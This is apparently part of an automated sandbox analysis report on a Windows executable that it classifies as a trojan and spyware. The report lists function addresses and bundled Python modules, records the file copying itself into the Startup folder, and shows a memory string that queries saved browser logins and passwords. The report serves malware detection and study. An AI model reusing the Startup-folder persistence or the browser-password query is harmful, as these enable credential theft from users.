Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2C1060	10_2_00007FFBAA2C1060
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2D8CB0	10_2_00007FFBAA2D8CB0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA34FD80	10_2_00007FFBAA34FD80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA309D80	10_2_00007FFBAA309D80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2FDDA0	10_2_00007FFBAA2FDDA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2BBDA0	10_2_00007FFBAA2BBDA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2CCDE0	10_2_00007FFBAA2CCDE0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA31AE70	10_2_00007FFBAA31AE70
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2D72D0	10_2_00007FFBAA2D72D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2D62F0	10_2_00007FFBAA2D62F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA354330	10_2_00007FFBAA354330
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3133B0	10_2_00007FFBAA3133B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA30A490	10_2_00007FFBAA30A490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2C3490	10_2_00007FFBAA2C3490
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3710E0	10_2_00007FFBAA3710E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B40B0	10_2_00007FFBAA2B40B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA31A110	10_2_00007FFBAA31A110
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3620B0	10_2_00007FFBAA3620B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3111D0	10_2_00007FFBAA3111D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA34A280	10_2_00007FFBAA34A280
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B3295	10_2_00007FFBAA2B3295
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3576C0	10_2_00007FFBAA3576C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2C66F0	10_2_00007FFBAA2C66F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2E0790	10_2_00007FFBAA2E0790
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA354750	10_2_00007FFBAA354750
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2FF7D0	10_2_00007FFBAA2FF7D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B77C4	10_2_00007FFBAA2B77C4
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2DD7C0	10_2_00007FFBAA2DD7C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B47C0	10_2_00007FFBAA2B47C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3527A0	10_2_00007FFBAA3527A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2CC800	10_2_00007FFBAA2CC800
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA35C870	10_2_00007FFBAA35C870
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B282E	10_2_00007FFBAA2B282E
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2DE4D0	10_2_00007FFBAA2DE4D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B74B1	10_2_00007FFBAA2B74B1
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B4510	10_2_00007FFBAA2B4510
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA322580	10_2_00007FFBAA322580
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2DC530	10_2_00007FFBAA2DC530
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2F4590	10_2_00007FFBAA2F4590
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA30B530	10_2_00007FFBAA30B530
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3585B0	10_2_00007FFBAA3585B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA3535D0	10_2_00007FFBAA3535D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAA2B9640	10_2_00007FFBAA2B9640
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB321FF0	10_2_00007FFBAB321FF0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3229C0	10_2_00007FFBAB3229C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3224A0	10_2_00007FFBAB3224A0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB322EC0	10_2_00007FFBAB322EC0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB321D80	10_2_00007FFBAB321D80
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB323550	10_2_00007FFBAB323550
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB332110	10_2_00007FFBAB332110
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB331D40	10_2_00007FFBAB331D40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB341F10	10_2_00007FFBAB341F10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3421C0	10_2_00007FFBAB3421C0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB361FA0	10_2_00007FFBAB361FA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB371F40	10_2_00007FFBAB371F40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB372050	10_2_00007FFBAB372050
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB381D40	10_2_00007FFBAB381D40
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3822D0	10_2_00007FFBAB3822D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB392160	10_2_00007FFBAB392160
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3A2070	10_2_00007FFBAB3A2070
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBAB3C2220	10_2_00007FFBAB3C2220
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB72C480	10_2_00007FFBBB72C480
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB730980	10_2_00007FFBBB730980
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7712B0	10_2_00007FFBBB7712B0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7718E0	10_2_00007FFBBB7718E0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB771000	10_2_00007FFBBB771000
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB797C38	10_2_00007FFBBB797C38
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7B7BA0	10_2_00007FFBBB7B7BA0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB7B7F79	10_2_00007FFBBB7B7F79
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB865770	10_2_00007FFBBB865770
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821AD7	10_2_00007FFBBB821AD7
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB899B30	10_2_00007FFBBB899B30
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB8221DF	10_2_00007FFBBB8221DF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821596	10_2_00007FFBBB821596
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821EDD	10_2_00007FFBBB821EDD
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: 10_2_00007FFBBB821D8E	10_2_00007FFBBB821D8E

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAB711325 appears 71 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAA5B0F90 appears 34 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FF78F482B30 appears 47 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAB78C181 appears 218 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAB6A3880 appears 114 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAB78C16F appears 50 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAA5894B0 appears 134 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAB78C93D appears 31 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAA58A550 appears 165 times
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Code function: String function: 00007FFBAB6A3800 appears 51 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FFBAA2B94B0 appears 134 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FF769322B30 appears 47 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FFBAA2E0F90 appears 34 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FFBBB723880 appears 114 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FFBAA2BA550 appears 165 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FFBBB821325 appears 105 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FFBBB89C16F appears 74 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FFBBB89C181 appears 220 times
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	Code function: String function: 00007FFBBB723800 appears 51 times

Source: _overlapped.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.9.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.9.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: HyZh4pn0RF.exe, 00000000.00000003.1468754068.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140_1.dllT vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1470563182.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_uuid.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1483242244.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepywintypes312.dll0 vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1470135236.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1470434646.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1470060822.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1469946066.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_overlapped.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1470258867.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1468353119.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1475480253.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1483757328.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1469455795.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1485125608.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewin32api.pyd0 vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1484383476.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1469859239.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_multiprocessing.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1469009173.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1483438477.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1469615826.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1475801441.0000027ADD238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepyexpat.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1469300025.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1468851780.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_asyncio.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1469737334.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000000.00000003.1470676625.0000027ADD237000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_wmi.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe	Binary or memory string: OriginalFilename vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1842934504.00007FFBBC156000.00000002.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1841251217.00007FFBBAE74000.00000002.00000001.01000000.00000018.sdmp	Binary or memory string: OriginalFilename_uuid.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1838524054.00007FFBAB7CF000.00000002.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1842441223.00007FFBBB3A2000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1842722016.00007FFBBBE96000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1833750878.00007FFBAABDA000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1840288260.00007FFBB62AB000.00000002.00000001.01000000.00000015.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1838167665.00007FFBAB6FD000.00000002.00000001.01000000.00000014.sdmp	Binary or memory string: OriginalFilenamepyexpat.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1835624099.00007FFBAB295000.00000002.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython312.dll. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1843741093.00007FFBBCD59000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1842069823.00007FFBBB385000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1843429491.00007FFBBC26E000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1839469008.00007FFBB4C4E000.00000002.00000001.01000000.00000017.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1832796629.00007FFBAA6DF000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1843229060.00007FFBBC247000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_wmi.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1841719090.00007FFBBAF63000.00000002.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe, 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs HyZh4pn0RF.exe
Source: HyZh4pn0RF.exe	Binary or memory string: OriginalFilename vs HyZh4pn0RF.exe

Source: classification engine

Classification label: mal100.troj.adwa.spyw.evad.winEXE@16/154@4/4

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Code function: 0_2_00007FF78F488560 GetLastError,FormatMessageW,WideCharToMultiByte,

0_2_00007FF78F488560

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3324:120:WilError_03

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI3442

Jump to behavior

Source: HyZh4pn0RF.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Architecture FROM Win32_Processor
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\HyZh4pn0RF.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: HyZh4pn0RF.exe, 00000002.00000002.1824412747.000002539B0A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SELECT action_url, username_value, password_value FROM logins;
Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: HyZh4pn0RF.exe	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: HyZh4pn0RF.exe, 00000002.00000002.1832675588.00007FFBAA6AC000.00000002.00000001.01000000.00000016.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: HyZh4pn0RF.exe

ReversingLabs: Detection: 50%

